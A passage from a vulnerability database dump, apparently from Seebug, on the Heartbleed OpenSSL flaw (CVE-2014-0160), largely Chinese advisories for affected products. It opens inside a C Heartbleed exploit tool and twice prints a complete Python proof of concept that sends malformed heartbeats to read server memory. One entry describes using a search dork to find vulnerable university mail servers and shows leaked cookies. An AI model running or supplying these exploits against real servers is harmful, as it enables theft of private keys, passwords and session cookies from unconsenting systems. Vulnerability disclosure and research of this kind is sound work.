output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] 
FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0||type < 0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tret = tcp_connect(host, port);\r\n\t\tpre_cmd(ret, precmd, verbose);\r\n\t\tc = tls_connect(ret);\r\n\t\theartbleed(c,type);\r\n\t\twhile(repeat==1){\r\n\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t}\r\n\t\twhile(loop==1){\r\n\t\t\tprintf("[ entered heartbleed 
loop\\n");\r\n\t\t\tfirst=0;\r\n\t\t\trepeat=1;\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t}\r\n\t\tprintf("[ done.\\n");\r\n\t\texit(0);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tret = tcp_bind(host, port);\r\n\t\twhile(1){\r\n \t\t\tsd=accept(ret,0,0);\r\n\t\t\tif(sd==-1){\r\n\t\t\t\tprintf("[!] FATAL: problem with accept()\\n");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t\tif(pid=fork()){\r\n\t\t\t\tclose(sd);\r\n\t\t\t}\r\n \t\t\telse{\r\n\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t\twhile(loop==1){\r\n\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\tfirst=0;\r\n\t\t\t\t\trepeat=0;\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86061", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:27:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nSophos Antivirus\u662f\u4e00\u6b3e\u9632\u75c5\u6bd2\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSophos Antivirus for vShield\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSophos Antivirus for vShield 1.0\r\nSophos Antivirus for vShield 
1.1\nNo detailed solution is currently available:\r\nhttp://www.sophos.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "Sophos Antivirus for vShield OpenSSL TLS Heartbeat Information Disclosure Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62197", "id": "SSV:62197", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:27:54", "description": "CVE ID:CVE-2014-0160\r\n\r\nSplunk is an engine for machine data. With Splunk you can collect, index and make use of the fast-moving machine data generated by all applications, servers and devices (physical, virtual and in the cloud).\r\n\r\nThe OpenSSL bundled with Splunk has a security vulnerability: a boundary error in OpenSSL's handling of the TLS \u201cheartbeat\u201d extension allows an attacker to exploit\n0\nSplunk 6.x\nSplunk 6.0.3 fixes this vulnerability; users are advised to download and use it:\r\nhttp://www.splunk.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "Splunk OpenSSL TLS Heartbeat Information Disclosure Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62198", "id": "SSV:62198", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:43", "description": "CVE ID:CVE-2014-0160\r\n\r\nOracle Session Monitor
Suite is a session monitoring suite released by Oracle.\r\n\r\nThe OpenSSL bundled with Oracle Session Monitor Suite has a security vulnerability: a boundary error in OpenSSL's handling of the TLS \u201cheartbeat\u201d extension allows an attacker to exploit the flaw to obtain 64k of memory contents from a connected client or server. The memory may include private keys, usernames, passwords and so on.\r\n0\r\nOracle Session Monitor Suite 3.x\r\nOracle Session Monitor Suite 3.3.40.2.1 fixes this vulnerability; users are advised to download and use it:\r\nhttp://www.oracle.com", "cvss3": {}, "published": "2014-04-21T00:00:00", "title": "Oracle Session Monitor Suite OpenSSL TLS Heartbeat Information Disclosure Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62240", "id": "SSV:62240", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:27:32", "description": "### Brief description:\n\nBundled up a bunch of websites; there are cookies in memory :D\n\n### Detailed description:\n\neYouMail 5 inurl:edu\nSites found by this search have roughly a 90% chance of being vulnerable\nSuccessful results from the first three pages\n\n\nPoC provided; test it yourself\n\n\n```\n#!/usr/bin/python\n# Quick 
and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n #print pay\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for 
server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\nif __name__ == '__main__':\n main()\n```\n\n \n\n### Proof of vulnerability:\n\n\n\n![1.jpg](https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg)\n\n\n\n\n![2.jpg](https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg)\n\n\nThere are cookies in memory \n\n![3.jpg](https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg)", "cvss3": {}, "published": "2014-04-11T00:00:00", "title": "eYou Mail (certain version): OPENSSL heartbleed works across the board", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-95013", "id": "SSV:95013", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:53", "description": "CVE 
ID:CVE-2014-0160\r\n\r\nLibreOffice is a suite compatible with other major office software that runs on a variety of platforms.\r\n\r\nThe OpenSSL bundled with LibreOffice has a security vulnerability: a boundary error in OpenSSL's handling of the TLS \u201cheartbeat\u201d extension allows an attacker to exploit the flaw to obtain 64k of memory contents from a connected client or server. The memory may include private keys, usernames, passwords and so on.\n0\nLibreOffice 4.x\nLibreOffice 4.2.3 fixes this vulnerability; users are advised to download and use it:\r\nhttp://www.libreoffice.org/", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "LibreOffice OpenSSL TLS Heartbeat Information Disclosure Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62190", "id": "SSV:62190", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T13:24:13", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "OpenSSL TLS Heartbeat Extension - Memory Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86019", "id": "SSV:86019", "sourceData": "\n #!/usr/bin/python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport 
time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n\r\nhb = h2bin(''' \r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time() \r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n\r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n\r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n 
sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n\r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86019", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:44", "description": "CVE ID:CVE-2014-0160\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u5bf9\u8c61\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\r\nPostgreSQL\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nPostgreSQL 8.x\r\nPostgreSQL 9.x\nPostgreSQL 9.3.4-3, 9.2.8-3, 9.1.13-3, 9.0.17-3\u548c8.4.21-3\u7248\u672c\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.enterprisedb.com", "cvss3": {}, "published": "2014-04-21T00:00:00", "title": "PostgreSQL OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62241", "id": "SSV:62241", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, 
{"lastseen": "2017-11-19T17:27:57", "description": "CVE ID:CVE-2014-0160\r\n\r\nVMware\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nVMware\u591a\u4e2a\u4ea7\u54c1\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nNicira Network Virtualization Platform (NVP) 3.x\r\nVMware ESXi 5.x\r\nVMware NSX 4.x\r\nVMware NSX 6.x\r\nVMware Fusion 6.x\r\nVmware Horizon Mirage 4.x\r\nVMware Horizon View 5.x\r\nVMware Horizon View Client 2.x\r\nVMware Horizon Workspace 1.x\r\nVMware OVF Tool 3.x\r\nVMware vCenter Server 5.x\r\nVMware vCloud Networking and Security (vCNS) 5.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.vmware.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "VMware\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62199", "id": "SSV:62199", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Endpoint Intelligence Agent\u662f\u4e00\u6b3eMcAfee\u4ea7\u54c1\u4e2d\u6240\u4f7f\u7528\u7684\u4e00\u4e2a\u7f51\u7edc\u670d\u52a1\u3002 \r\n\r\nMcAfee Endpoint Intelligence 
Agent\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent)\nMcAfee Endpoint Intelligence Agent 2.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.mcafee.com", "cvss3": {}, "published": "2014-04-21T00:00:00", "title": "McAfee Endpoint Intelligence Agent OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62238", "id": "SSV:62238", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:35:43", "description": "CVE ID:CVE-2014-0160\r\n\r\nIBM XIV Storage System\u662f\u4e00\u6b3e\u7f51\u683c\u5b58\u50a8\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nIBM XIV Storage System\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nIBM XIV Storage System 11.3.0\r\nIBM XIV Storage System 11.3.0.a\r\nIBM XIV Storage System 11.3.1\r\nIBM XIV 
Storage System 11.4.1\r\nIBM XIV Storage System 11.4.1.a\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u516c\u544a\u83b7\u53d6\u8865\u4e01\u4ee5\u4fee\u590d\u8be5\u6f0f\u6d1e\uff1a\r\nhttp://www.ibm.com/support/docview.wss?uid=ssg1S1004577", "cvss3": {}, "published": "2014-04-16T00:00:00", "type": "seebug", "title": "IBM XIV Storage System OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62188", "id": "SSV:62188", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:28:38", "description": "CVE 